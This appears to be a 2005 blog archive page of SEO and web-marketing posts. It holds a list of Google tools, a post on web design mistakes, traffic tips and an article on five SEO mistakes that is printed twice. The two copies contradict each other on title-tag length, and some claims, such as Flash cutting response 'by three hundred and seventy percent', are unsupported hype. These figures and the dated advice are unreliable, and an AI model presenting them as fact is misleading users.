Similar page checker. This free tool allows you to check the similarity between two pages.

http://www.google-dance.net/
Google Dance tool. The Google "Dance" (update) can be identified when the backlink counts of major sites are different on several specific Google data centers. This tool updates every 60 minutes and you can also check your own backlinks on the data centers.

http://www.googlefight.com/
Google Fight. Wondering which keywords for a particular subject are most popular? Google Fight allows you to enter 2 keywords or phrases and compare the results.

http://www.researchbuzz.org/archives/001405.shtml
Goofresh is a tool to search for sites added in the last 24 hours, 48 hours, 7 days or last 30 days.

http://www.void.be/googletool.html
Google Tool. Search for results on one or more of Google's 15 data centers.

http://douweosinga.com/projects/googlehistory
Google history. Find out in what year an event occurred (post 1800)


http://douweosinga.com/projects/googlepos
Google Pos. Discover the ranking for a particular site for a keyword or keyphrase.

http://www.googlerankings.com/
GoogleRankings. Another tool for checking position based on keywords.

http://www.markhorrell.com/tools/pagerank.html
The PageRank Calculator is designed to mimic the workings of the PageRank algorithm to calculate an estimated score.

http://www.googleguy.de/google-yahoo/
Google - Yahoo Comparison. Allows for a side by side search of both Google and Yahoo.

Friday, May 20, 2005

The 5 Biggest Mistakes Almost All Web Designers Make -- And Why These Mistakes Could Cost YOU A Fortune!

Huge Mistake #1: Creating a Website with Flash -- Did you know that in a recent study, top internet marketers discovered that having a website created with Flash actually DECREASED the response from prospects and customers by as much as three hundred and seventy percent?

Here's why: Your prospects and customers are most likely visiting your website using all types of different computers, connection speeds and internet configuration settings...

What may look GREAT to one visitor, may not even appear for another! You could very easily have shelled out hundreds or even thousands of dollars to have a website created using the Flash technology, only to find out that some of your visitors will never see it! (not to mention the loading times can cause your visitor to close your site, never to return again.)

Huge Mistake #2: The "Internet Catalog" Approach -- You see this everywhere. Good, honest and hardworking businessmen and women get online to sell their products or services, and have a site created for them that contains a link to just about everything they offer on one page. Their thinking goes along the lines of, "...well, I don't want to leave anyone out. If they come to my site, I want to make sure I have what they're looking for..." -- This way of thinking could not be further from the truth.

Here's why: There's an ancient rule that goes back to the very beginning of direct-marketing on the internet, taught by the richest, most legendary and well-respected internet marketers of all time...

"When you give your prospects too many choices, they become confused and aren't sure what to do next. Confused people never buy anything."

Huge Mistake #3: Optimizing Your Sales Site for the Search Engines -- You'll see this taught in nearly every "internet marketing" course, manual or eBook out there... "You must optimize every page of your website for the search engines!" -- In fact, this false teaching is accepted as 'gospel truth' so often, that most web designers will offer to do this for you at no, or little extra cost...

What they DON'T understand is that certain words and phrases must be either re-worded (to make it "keyword rich") or taken out completely, just to be looked upon highly by the mighty search engines -- and this could KILL your sales, literally overnight.

Here's why: When you or a hired web designer optimize your SALES page (i.e. any web page designed to sell your products and services) to get a higher listing in the search engines, you're going to have to sacrifice the pulling-power of your sales copy (i.e. written sales material) just to get those higher listings. Sure, this can bring you more traffic -- but what good is all the traffic in the world, if your visitors arrive at your website and aren't compelled enough to read why they should order your product?

For years, it has been taught that you should always try to find a "balance" of SEO (Search-Engine-Optimization) mixed with promotional copy designed to sell your products and services...

WRONG AGAIN! -- The truth is that you should NEVER optimize your sales page for the Search Engines. Instead, you should create tiny "entry pages" for each keyword related to your product or service, (highly optimized for the Search Engines) and have them link to your main sales site! (we can show you exactly how to do this quickly and easily and get *massive* targeted traffic from the Search Engines - without ever *touching* your sales site!)

Huge Mistake #4: Having a "Graphics-Based" Website -- Sure, graphics can certainly help us to visualize a particular situation or circumstance, product or service... But did you know that having a graphically-driven website can actually DISTRACT your visitor away from your sales message?

After all, your sales message (or "web copy") is THE #1 most important factor in a website that makes money. If your visitors are paying more attention to your "professional graphics" than your sales message... you've just lost another sale.

Here's why: You've got approximately seven seconds from the time your visitor arrives at your site, to the time they decide whether to buy your product, get more information or LEAVE. If you've got a graphically-intensive website, your website will most likely still be loading past your seven-second time limit.

That's a "customer-killer" in and of itself - however, the real reason lies within the fact that the bigger, brighter and more beautiful your graphics are, the more they will distract your visitor from your sales message. And if your visitor is distracted even for one second, it could mean the difference between getting a sale, and losing a customer.

Huge Mistake #5: Designing a Website with ZERO Marketing Experience -- Most web designers have no idea how to make money on the internet, with anything other than their design services. It's not their fault - they simply have no or very little marketing and sales experience. After all, they're just website designers...

However, having your website designed by someone with ZERO internet marketing experience is like buying a street-car without an engine... it won't go anywhere, and it'll just waste your time and money!

Part I : Getting Free Hits Using These Simple Tips & Tricks

Search Engine Optimization

Search engines still remain the #1 tool for generating free targeted traffic to any website, so make sure that your site is indexed in every major search engine. Do a thorough check of all the meta tags and make sure you are not missing any. The most important meta tag is the "Title" tag, which should be kept short and sweet. Then come the "Description" and the "Keywords" tags; please make sure that you are not dumping keywords into these tags which do not belong to your website - e.g. don't include keywords for selling perfumes when you are selling books. Make sure that the description and the keywords are relevant to your website.

Another major thing that no one will tell you is that you MUST have the keywords and description embedded in your webpage itself to get a high rank in the search engines. What I mean by this is, if your keywords include "Candy, Gum, Lollypop" and your description is "We sell all types of chocolates and candy here", then you MUST have the same words somewhere in your webpage. This is how the search engines check the relevancy of the meta tags.

These are just 3 of the major meta tags which should be there on every page. With the ever growing search engine popularity and the way they categorize their searches, there are some other meta tags which should be used to describe the site, like "Language", "Robots", "Revisit" etc. To get details on these tags click this link.
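As an illustration of the tags mentioned above (the shop name and exact attribute values are hypothetical, and engines vary in which of these tags they honour):

```html
<head>
  <title>Chocolate Shop - Candy, Gum and Lollypops</title>
  <meta name="description" content="We sell all types of chocolates and candy here">
  <meta name="keywords" content="Candy, Gum, Lollypop">
  <!-- The additional descriptive tags: language, robots, revisit -->
  <meta http-equiv="content-language" content="en">
  <meta name="robots" content="index, follow">
  <meta name="revisit-after" content="7 days">
</head>
```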

Please make a note that you need to get your website listed on DMOZ, which is the largest human-edited directory and which feeds all the major search engines. Listing on DMOZ is free and it can bring highly targeted traffic to your website as well as improve your ranking on other search engines. Visit http://www.dmoz.org

** NEVER use refresh or redirect scripts on your index pages as most of the search engines will exclude those pages.

Link Exchange

This is undoubtedly the second major free targeted traffic source. Now, not many webmasters know that having hundreds of links on their website pointing to other UNrelated websites will do more harm than good. First rule of thumb: NEVER have lots of outbound links on your index page, and secondly, exchange links only with those websites which have similar content or sell complementary products. Search engines are very smart and can easily tell from your meta tags whether the site you are linking to has similar content or not. Don't try to fool the search engines or you will end up a fool yourself. I know that exchanging links is not simple and takes time, but it is the best time investment you will ever make. Having quality sites linking to you means a better rank for your website. Another important thing to note is that it is better to exchange text links rather than graphics, as text links are more search engine friendly. Also, keep changing your text link description from time to time so that you can have fresh and different keywords fed to the searches.

So, now the question is: how do you find similar websites? Very easy. Do a search on Google or the DMOZ directory and you will get a list of websites. Then contact the webmaster of each website individually and ask for a link exchange.

I also found this website very useful in finding similar content websites. http://www.linkexchange.com

Affiliate Program

Have you ever paid to have your banners displayed 10,000 times, ended up paying 10 cents a click, and not gotten a single sale out of it? This is what happens to most of us when we start advertising our website and products. We think that if even 5% of those 1,000 people who visit buy something, then we have made a profit! But how often does this happen? Close to never. Why pay per click when you can start your own affiliate program and pay commission per sale? That's right! You don't pay your affiliates until someone actually buys something from your website. This way you get all the clicks you want, and if no one buys anything, then you don't lose anything either. You can promote your affiliate program to other webmasters through discussion boards or emails. Think about it: you can have tons of webmasters linking to your products, and you don't spend a dime until you get paid! Sounds great!

Wednesday, May 18, 2005

The 5 Most Common SEO Mistakes

Having been in the business of optimizing web sites for high search engine rankings for over five years now, I have come across a number of “optimized” sites that use search engine optimization (SEO) techniques that are just plain WRONG.

Most of these sites were optimized by persons just starting out; SEO beginners not yet familiar enough with the industry to determine SEO fact from SEO fiction. But what’s scary is that some of the sites I’ve seen using incorrect methods have been optimised by so called search engine optimization “experts” who really should know better.

Some common themes develop amongst incorrectly optimized sites. Could YOU be making the same errors with your site? To find out, let’s look at the five most common search engine optimization mistakes: 

1) Non Utilization of the Title Tag

How many times have you looked at a web site where the browser title reads “Welcome to [company name]’s web site” or simply “[Company Name]”? Nothing wrong with that, I hear you say? Well if you want to achieve high search engine rankings, there’s PLENTY wrong with it. 

You see, while it may not be common knowledge amongst web designers, most search engines index the content of title tags and consider it to be one of the most important factors in their relevancy algorithm. What you place in your title can make or break your ranking for particular search terms on the various engines. If you don’t include your most important search phrases within your title tag, you are overlooking a vital opportunity in your quest for higher search rankings.

Having said this, you should try and keep your title tag to a maximum of 200 characters, as that is the average limit most search engines will truncate to. If you really insist on including your company name in your title and you’re willing to sacrifice good keyword real estate to do so, put it at the very end of the tag, because search engines give more relevancy “weight” to content at the start of your tag.
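For instance (the business and search phrase are invented for illustration), a title that leads with the search phrase and relegates the company name to the very end might read:

```html
<title>Printer Repair in Ohio - Fast On-Site Service | Acme Repairs</title>
```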


2) Use of Untargeted Keywords and Phrases

Another common mistake made by webmasters and SEO learners is their choice of keywords placed in the META keyword tag. Sure it might seem logical to target the word “printers” if you run a printer repair business in Ohio, but think about it – even if you succeeded in ranking well for such a competitive term (you won’t), how many of the people visiting your site as a result of this search would leave as soon as they saw your home page? That’s right, most of them. All the people who wanted to buy printers, all the people looking for businesses outside Ohio, all the people not looking specifically for printer repairers. 

Does it become clear now that targeting such a generic word is a waste of time? What you need to do instead is optimize your site for search terms and phrases that are highly targeted to your precise business. Use a tool such as Wordtracker (keyword location software) to find what people are actually typing in to the search engines to find goods and services similar to yours and concentrate on ranking well for those terms. The more qualified your site visitors are, the more likely you are to convert those visitors into paying customers.


3) A Lack of Optimized Body Text

This one is very common. How often do you visit a home page that is made up entirely of graphics? You know the ones – they consist of an enormous Flash file or maybe a large logo or a montage of images, but the thing they have in common is a distinct lack of text. Think they look professional? Think again. No matter what you read or hear, if a site has no text on the home page, it hasn’t been correctly optimized and has little chance of ranking well in the search engines. Now that’s unprofessional in my opinion.

Beginner SEO’s often make the mistake of creating an optimized title tag and META tags and believing their work is done. WRONG. If you want a web site to rank well in the search engines, you need to give them what they want to see – visible content that is optimized just as well as the invisible content. That means adding keyword-filled body text to any page you want ranking high. Why? Because most search engines can’t index images. Some engines don’t even index META tags anymore. So a site with no visible content becomes effectively invisible to a search engine and has almost no chance of appearing in the rankings for logical searches.


Also, search engine algorithms have become smarter and are now checking that sites contain highly relevant content before including them in their index. If you expect to rank well for a particular keyword or phrase, it’s not too much to expect to find that keyword or phrase within your site is it? 


4) Submitting to 1,000 Search Engines

I love this one. I’ve lost count of how many banner ads or web sites I’ve seen boasting “We’ll submit your site to 1,000 search engines!”  I can’t believe the hype is still prevalent that you need to submit a web site to thousands of search engines in order to receive traffic. This is just NOT TRUE.

In fact, studies show that approximately 90% of search traffic still comes from the 10 major U.S. search engines and directories. Companies that advertise submission to thousands of search engines are usually including in that list minor engines or directories that utilize the databases of major engines anyway (so don't require submission), or a large number of Free For All (FFA) sites. Submitting your site to FFA pages can damage your site's reputation in the search engines, because they consider FFA sites to be of very low quality, utilizing spamdexing techniques in an attempt to falsely inflate a site's link popularity. I've even seen examples of sites being banned from a search engine for having their pages listed on FFA sites by ill-informed webmasters without the site owner's knowledge.



If you are targeting specific geographic markets, you might like to submit your site to the most popular regional search engines in those countries, but the fact is that most people worldwide continue to use the U.S. versions of search engines such as Yahoo and AltaVista despite the fact that there are local versions available. The bottom line? Get your site listed on the 10 most popular search engines and directories and you will have the major worldwide traffic sources covered.

5) Resubmitting Too Soon and Too Often

So you’ve optimized your site and submitted it to the most important search engines. But it’s been three weeks and you haven’t received any traffic. Time to resubmit, right? WRONG. Depending on the search engine, they can take up to twelve weeks to include your site in their index. Each search engine and directory work to their own time frame. You need to check their average submission times and be patient.

So when you’re in, what then? You should regularly submit to ensure you’re ranked above your competitors, maybe once a month or once a week, right? WRONG AGAIN. Once you’re in a search engine’s database, there is no need to resubmit your site. It’s pointless actually, because they already know about your site and their robot is scheduled to revisit and reindex all sites in the database on a regular basis. Resubmitting wastes everybody’s time and can actually get your URL permanently banned from a search engine for “spamdexing”.


The only time you need to resubmit your site to a search engine is if your URL changes or if your domain suddenly drops out of their database entirely. NOT if your ranking drops, NOT if your content changes, but if the domain is actually nowhere to be found in the index (this can happen from time to time as the search engines spring-clean their databases). A good SEO will monitor your rankings regularly (monthly is fine) and only resubmit when absolutely necessary.


So those are the five most common SEO mistakes. Any sound familiar? Don’t worry, you’re in good company. Now that you’ve recognised the problem areas and are better equipped with the correct information, you’ll be able to reverse the damage.
Having been in the business of optimizing web sites for high search engine rankings for over five years now, I have come across a number of “optimized” sites that use search engine optimization (SEO) techniques that are just plain WRONG.

Most of these sites were optimized by persons just starting out; SEO beginners not yet familiar enough with the industry to determine SEO fact from SEO fiction. But what’s scary is that some of the sites I’ve seen using incorrect methods have been optimised by so called search engine optimization “experts” who really should know better.

Some common themes develop amongst incorrectly optimized sites. Could YOU be making the same errors with your site? To find out, let’s look at the five most common search engine optimization mistakes: 

1) Non Utilization of the Title Tag

How many times have you looked at a web site where the browser title reads “Welcome to [company name]’s web site” or simply “[Company Name]”? Nothing wrong with that, I hear you say? Well if you want to achieve high search engine rankings, there’s PLENTY wrong with it. 

You see, while it may not be common knowledge amongst web designers, most search engines index the content of title tags and consider it to be one of the most important factors in their relevancy algorithm. What you place in your title can make or break your ranking for particular search terms on the various engines. If you don’t include your most important search phrases within your title tag, you are overlooking a vital opportunity in your quest for higher search rankings.

Having said this, you should try to keep your title tag to roughly 60-70 characters, as most search engines will truncate anything longer in their results pages. If you really insist on including your company name in your title and you're willing to sacrifice good keyword real estate to do so, put it at the very end of the tag, because search engines give more relevancy "weight" to content at the start of your tag.
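To make the title-tag advice above concrete, here is a minimal sketch of a checker a webmaster might run over proposed titles. The 65-character budget and the function name are illustrative assumptions, not fixed search-engine rules.

```python
# Illustrative title-tag checker: keep titles short and lead with the
# most important keyword phrase. The 65-character budget is an
# assumption for illustration, not a fixed search-engine limit.
MAX_TITLE_LEN = 65

def title_warnings(title, keyphrase):
    """Return a list of warnings for a proposed <title> tag."""
    warnings = []
    if len(title) > MAX_TITLE_LEN:
        warnings.append("title may be truncated in search results")
    lowered = title.lower()
    if keyphrase.lower() not in lowered:
        warnings.append("key phrase missing from title")
    elif not lowered.startswith(keyphrase.lower()):
        warnings.append("key phrase is not at the start of the title")
    return warnings

print(title_warnings("Welcome to Acme's web site", "printer repair"))
# warns that the key phrase is missing from this generic title
```

A title like "Printer Repair in Ohio | Acme" passes cleanly, because the key phrase comes first and the company name is relegated to the end of the tag.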


2) Use of Untargeted Keywords and Phrases

Another common mistake made by webmasters and SEO learners is their choice of keywords placed in the META keyword tag. Sure it might seem logical to target the word “printers” if you run a printer repair business in Ohio, but think about it – even if you succeeded in ranking well for such a competitive term (you won’t), how many of the people visiting your site as a result of this search would leave as soon as they saw your home page? That’s right, most of them. All the people who wanted to buy printers, all the people looking for businesses outside Ohio, all the people not looking specifically for printer repairers. 

Does it become clear now that targeting such a generic word is a waste of time? What you need to do instead is optimize your site for search terms and phrases that are highly targeted to your precise business. Use a tool such as Wordtracker (a keyword research tool) to find what people are actually typing into the search engines to find goods and services similar to yours, and concentrate on ranking well for those terms. The more qualified your site visitors are, the more likely you are to convert those visitors into paying customers.
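The trade-off behind this advice can be sketched numerically. Wordtracker popularized the Keyword Effectiveness Index (KEI), roughly search popularity squared divided by the number of competing pages; the exact figures below are made up purely for illustration.

```python
# Rough sketch of how keyword research tools rank candidate phrases.
# KEI here is (daily searches ** 2) / competing pages; higher is better.
# The search and competition numbers are invented for illustration.
def kei(daily_searches, competing_pages):
    if competing_pages == 0:
        return float("inf")
    return daily_searches ** 2 / competing_pages

candidates = {
    "printers": (5000, 9_000_000),        # generic, hugely competitive
    "printer repair ohio": (100, 2_000),  # targeted, little competition
}
ranked = sorted(candidates, key=lambda k: kei(*candidates[k]), reverse=True)
print(ranked[0])   # the targeted phrase wins despite far fewer searches
```

The targeted phrase scores higher even though it gets a tiny fraction of the searches, which is exactly the point: fewer, better-qualified visitors beat a flood of visitors who leave immediately.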


3) A Lack of Optimized Body Text

This one is very common. How often do you visit a home page that is made up entirely of graphics? You know the ones – they consist of an enormous Flash file or maybe a large logo or a montage of images, but the thing they have in common is a distinct lack of text. Think they look professional? Think again. No matter what you read or hear, if a site has no text on the home page, it hasn’t been correctly optimized and has little chance of ranking well in the search engines. Now that’s unprofessional in my opinion.

Beginner SEOs often make the mistake of creating an optimized title tag and META tags and believing their work is done. WRONG. If you want a web site to rank well in the search engines, you need to give them what they want to see: visible content that is optimized just as well as the invisible content. That means adding keyword-rich body text to any page you want to rank highly. Why? Because most search engines can't index images. Some engines don't even index META tags anymore. So a site with no visible content becomes effectively invisible to a search engine and has almost no chance of appearing in the rankings for logical searches.


Also, search engine algorithms have become smarter and now check that sites contain highly relevant content before including them in their index. If you expect to rank well for a particular keyword or phrase, it's not too much to expect to find that keyword or phrase within your site, is it?
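This point, that only the visible text of a page is indexable, can be demonstrated with a small script. The sketch below strips markup with Python's standard library and checks whether the target phrase actually survives as body copy; an all-image page yields nothing at all.

```python
# Minimal sketch: extract the visible, indexable text from a page.
# Tags, scripts and stylesheets are discarded; only body copy remains.
from html.parser import HTMLParser

class TextExtractor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip = 0          # depth inside <script>/<style>
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1
    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)

def visible_text(html):
    parser = TextExtractor()
    parser.feed(html)
    return " ".join(" ".join(parser.chunks).split())

page = ('<html><body><img src="logo.gif">'
        '<p>Printer repair in Ohio, same-day service.</p></body></html>')
print("printer repair" in visible_text(page).lower())   # True
```

Run the same check against a page that is one big logo image and the result is an empty string: from a search engine's point of view, the page says nothing.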


4) Submitting to 1,000 Search Engines

I love this one. I’ve lost count of how many banner ads or web sites I’ve seen boasting “We’ll submit your site to 1,000 search engines!”  I can’t believe the hype is still prevalent that you need to submit a web site to thousands of search engines in order to receive traffic. This is just NOT TRUE.

In fact, studies show that approximately 90% of search traffic still comes from the 10 major U.S. search engines and directories. Companies that advertise submission to thousands of search engines are usually padding that list with minor engines or directories that utilize the databases of major engines anyway (so don't require submission), or with a large number of Free For All (FFA) sites. Submitting your site to FFA pages can damage your site's reputation in the search engines, because they consider FFA sites to be of very low quality and to utilize spamdexing techniques in an attempt to falsely inflate a site's link popularity. I've even seen examples of sites being banned from a search engine for having their pages listed on FFA sites by ill-informed webmasters without the site owner's knowledge.



If you are targeting specific geographic markets, you might like to submit your site to the most popular regional search engines in those countries, but the fact is that most people worldwide continue to use the U.S. versions of search engines such as Yahoo and AltaVista despite the fact that there are local versions available. The bottom line? Get your site listed on the 10 most popular search engines and directories and you will have the major worldwide traffic sources covered.

5) Resubmitting Too Soon and Too Often

So you've optimized your site and submitted it to the most important search engines. But it's been three weeks and you haven't received any traffic. Time to resubmit, right? WRONG. Depending on the search engine, it can take up to twelve weeks to include your site in its index. Each search engine and directory works to its own time frame. You need to check their average submission times and be patient.

So when you’re in, what then? You should regularly submit to ensure you’re ranked above your competitors, maybe once a month or once a week, right? WRONG AGAIN. Once you’re in a search engine’s database, there is no need to resubmit your site. It’s pointless actually, because they already know about your site and their robot is scheduled to revisit and reindex all sites in the database on a regular basis. Resubmitting wastes everybody’s time and can actually get your URL permanently banned from a search engine for “spamdexing”.


The only time you need to resubmit your site to a search engine is if your URL changes or if your domain suddenly drops out of their database entirely. NOT if your ranking drops, NOT if your content changes, but if the domain is actually nowhere to be found in the index (this can happen from time to time as the search engines spring-clean their databases). A good SEO will monitor your rankings regularly (monthly is fine) and only resubmit when absolutely necessary.
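The resubmission rule above boils down to a single predicate. Here it is spelled out as a tiny function a rank-monitoring script might use; the flag names are hypothetical.

```python
# The resubmission rule as a predicate. The two inputs are hypothetical
# flags a monthly rank-monitoring script might track.
def should_resubmit(url_changed, found_in_index):
    # Resubmit only if the URL changed or the domain vanished from
    # the index -- never because rankings or content changed.
    return url_changed or not found_in_index

print(should_resubmit(url_changed=False, found_in_index=True))   # False
```

A ranking drop with the domain still present in the index returns False, which matches the advice: monitor, be patient, and leave the submit button alone.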


So those are the five most common SEO mistakes. Any sound familiar? Don’t worry, you’re in good company. Now that you’ve recognised the problem areas and are better equipped with the correct information, you’ll be able to reverse the damage.